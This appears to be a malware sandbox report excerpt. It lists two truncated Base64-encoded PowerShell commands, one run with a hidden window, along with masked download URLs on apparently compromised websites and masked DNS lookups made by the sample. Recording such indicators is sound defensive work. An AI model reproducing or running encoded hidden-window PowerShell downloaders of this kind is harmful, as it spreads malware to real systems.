Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAHQAdwB5AGQAaABhAGkAdgBjAG4AbgA9ACcARQB6AHAAdwBxAGgAcwBpACcAOwAkAFkAYgBxAHUAYwBiAGcAYwBxAHoAZwAgAD...
- http://hi####48blog.biz/wp-admin/VmfOpW/
- http://so#####npoolcare.com/central.function/xvt-iqa0qu-6812406689/
- DNS ASK hi####48blog.biz
- DNS ASK ba####salama.com
- DNS ASK ho####cietepromo.ca
- DNS ASK so#####npoolcare.com
- DNS ASK te######ndirectsales.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAHQAdwB5AGQAaABhAGkAdgBjAG4AbgA9ACcARQB6AHAAdwBxAGgAcwBpACcAOwAkAFkAYgBxAHUAYwBiAGcAYwBxAHoAZwAgAD...' (with hidden window)